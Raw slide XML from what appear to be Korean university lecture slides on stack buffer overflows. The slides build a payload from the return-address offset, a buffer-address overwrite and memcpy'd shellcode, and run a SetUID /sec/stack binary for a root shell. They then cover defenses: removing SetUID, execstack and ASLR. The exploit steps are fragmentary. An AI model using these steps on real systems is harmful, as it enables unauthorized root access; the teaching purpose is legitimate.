                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가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복귀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>다음과 같은 페이로드가 준비된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>.</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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> ((long *)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(long)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+ 4);</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dirty="0">
                        <a:effectLst/>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0631132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="_x564938936">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88597877-B49A-47BC-BAEF-49FD67383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7029" y="1876626"/>
            <a:ext cx="2298877" cy="3104744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49154" name="_x564941312">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DAC8B12-17AD-4D77-8624-505DB03028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8636" y="1876626"/>
            <a:ext cx="2298877" cy="310402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973B1750-BBDB-4A5D-932C-555DCB1F22CE}"/>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12D2A2-974C-4D35-B0BA-0858CAC749C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27A27E9-BB2D-41E3-B51E-46BA51DF3FC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A077C7EA-A0C4-466B-8124-6B7D9EE6C4D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282406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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일을 실행하여 루트 쉘 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ ./stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="표 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049CFF3B-8277-4780-B382-55D6783068EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1670393565"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="552010" y="531791"/>
          <a:ext cx="5029640" cy="4023880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5029640">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675159690"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="26780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3756073">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a: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memcpy (buffer + sizeof (buffer</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>- sizeof (shellcode), shellcode, sizeof (shellcode))</a:t>
                      </a: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8025249"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="_x564957368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507E7344-3FC1-430B-AB6B-CAD87F5EA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895" y="1396921"/>
            <a:ext cx="2277247" cy="30742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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE841136-D24E-4F8C-98EB-335D1FE02A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1165" t="2082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="5137297"/>
            <a:ext cx="4903081" cy="590565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFAC1FD6-2A5F-46CF-AE10-D0CB522CC28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쉘을 획득한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>상태에서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2" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDC04FE9-5AA5-45D2-917E-75E7A4694F30}"/>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62520C4-69C6-43DC-B25D-3085BBC6C4A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D561F6CE-640E-4B4A-B452-4CB037E1E0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B3E00A10-1226-4A04-B94C-84962153F97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5003695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C6642C97-AE41-486C-BE08-8D12FAF981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통해 쉘 코드가 실행되지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값</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: execstack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139A787F-55D9-4280-A8E7-48BDE3B120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C3DFF4-2FD7-4BB3-B403-C968BA8BCA13}"/>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쉘코드를</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endParaRPr lang="ko-KR" altLang="en-US" sz="950" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="타원 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D80CE4A-C2E9-4560-8E50-EB848B2EAE7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C3017B1-DBDF-418B-BC4C-BD9FA0CFACF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F0DE2446-C02B-47FA-9538-513B519A14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A4D0FFD-0653-4F8F-8056-CFE9FBC86D85}"/>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23" name="그룹 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16B0DA0-CF87-4217-BA6E-21FF424C1CDB}"/>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8C50A4C0-C1BB-4488-87A0-07928015F5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B68F201F-2885-494C-B5EA-7C4A69EAB1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B5D75FCD-6725-40D7-A146-4937F85BA7B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14617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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 해제</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dirty="0"/>
              <a:t># ls –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack*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스택 실행 방지 설정 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–c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a:t># execstack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>–q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C7DBDD6-CBB4-41A5-9432-8FEB5F7C7146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="488950" y="833966"/>
            <a:ext cx="4727194" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5661EAAE-E448-42C9-A743-DC8DACC6B013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="5111" r="2302" b="19042"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="2149362"/>
            <a:ext cx="4958142" cy="641521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA759F0-00FE-4ADB-B599-D6E8C0B1728C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="576462405"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="483152" y="2880142"/>
          <a:ext cx="4932807" cy="2443353"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1163277480"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23408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63118803"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2012252">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해제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실행되기는 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 그림의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>경우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권한을 가지는 쉘이 나타난다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816622"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53249" name="_x1658446056">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A57FB5-7F34-409E-850A-FA077295B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19" y="3671797"/>
            <a:ext cx="4779963"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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6A4311-731E-4CA8-BFC4-6D2BBC40CF4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="483152" y="5773673"/>
            <a:ext cx="4983480" cy="556260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="표 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E78BD65-C113-4787-9C38-CB1A8A9FEA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4159537457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6282989" y="470112"/>
          <a:ext cx="4932807" cy="3174175"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="195635228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15156180"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2686685">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실행시마다 주소가 변경되어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2149480"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53251" name="_x617035992">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9E9A5-A524-47B8-B9D1-99DEDA94637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7" t="325"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6384472" y="1719795"/>
            <a:ext cx="4742542" cy="17611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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CE4F803-2A1D-408C-BE49-1E5975DE82A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282989" y="4521813"/>
            <a:ext cx="4503420" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="그룹 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FC0D6E-5653-432A-B10A-3E0EDD8A38AB}"/>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257331A-9C23-4EF9-BF76-BD7F10A19E7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E410D5-8201-4E91-8981-B9EA3BFD0B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2F274F48-80C7-42DF-A2A9-14023AB1B6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052178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7EC4553F-CF47-4982-BAED-66DAB834C2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2829087457"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="620276" y="498663"/>
          <a:ext cx="4932807" cy="2930335"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8629174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95016968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="25204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스택 내에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자체의 실행이 불가능하게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8416208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56321" name="_x1658344864">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AC8636-B837-4BB9-B28F-49DD5F96F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60" y="1311503"/>
            <a:ext cx="4770438" cy="2006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E17C4A-3B31-4DDC-AF8F-C53104642EDB}"/>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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA4EFB41-A839-4942-B067-E5C42D9F4F1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3795B63-DDAA-4482-B875-5A0C980BA18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B690D8B-DF94-4BFB-9CDD-FAAEFD112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0C8F88F4-67B1-4644-816D-F049F6B7454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146057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출력하시오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50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5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5FEFB03D-34B9-4EE6-85B6-79AF701BA0F5}"/>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0C0A1CA-A354-4356-922E-F509B5745B6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F83B7B-F873-4C64-A599-22B2D19FCB7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67C74A80-9583-4D92-800C-344EF6D87B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78825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란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="화살표: 오른쪽 20">
            <a:hlinkClick r:id="rId2"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{586E501C-0EC3-4EAE-A2E9-59C854E0D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258" y="1978939"/>
            <a:ext cx="5349876" cy="3211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38F3E-DA3A-4BA9-9352-E5748507BE3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482032" y="5478449"/>
            <a:ext cx="11154329"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Windows10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>운영체제에서 리눅스 운영체제의 쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>시스템을 사용할 수 있도록 지원해주는 기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windwos10 2004 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>버전</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>Hyper-V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>를 사용하면서 다른 가상화 프로그램을 사용할 수 없음</a:t>
            </a:r>
